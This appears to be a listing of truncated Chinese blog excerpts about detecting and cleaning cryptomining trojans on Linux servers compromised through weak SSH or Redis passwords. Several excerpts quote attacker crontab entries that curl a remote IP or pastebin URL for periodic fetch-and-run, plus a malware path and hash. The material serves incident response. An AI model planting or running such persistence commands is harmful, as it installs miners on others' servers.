一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

一、什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內 ...

如果是雲服務器可以在‘雲監控-態勢與感知’中直接看到木馬文件相關進程name，id以及路徑如下：文件路徑: /opt/apache-tomcat-7.0.104/bin/shell1.elf惡意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce進程id: 27504 ...

最近emr集群跑任務的時候總出現 task failed ，優化sql，調提交任務參數都沒解決，最后再我排查時候，發現一個從節點的cpu使用800% 經過一些列排查，發現是被注入木馬了， #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...

轉自 https://juejin.im/post/5aa0cc476fb9a028d82b5695最近打開服務變得很慢，然后 CPU，內存占用有達到了100%，打開網站都很慢，這個肯定很反常的，平時cpu不會達到那么高，因此netstat -ntlp 准備看看端口占用是不是有什么異常，有的會看 ...

背景 最近由於在弄springboot shiro的redis session共享的問題，所以在服務器上部署了redis，因為沒有太多的考慮所以沒有設置密碼。 等到第二天的時候，發現redis外網無法訪問內網可以。 查看端口綁定情況 netstat -antlp | grep 6379 ...

非專業人事第一次處理挖礦木馬，脫殼啥的也不會，一點一點找到並刪除相關文件，最后整理為清理腳本 事由 發現我的esxi內的Gitlab虛機連不上了，登錄顯示ERROR:ld.so：object '/usr/local/lib/libprocessshider.so' from /etc ...

這幾天阿里雲雲服務器cpu一直跑滿，一查發現有個定時任務，在搜索一下，發現自己中毒了，原來前幾天搞redis學習的時候設置了個弱密碼，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...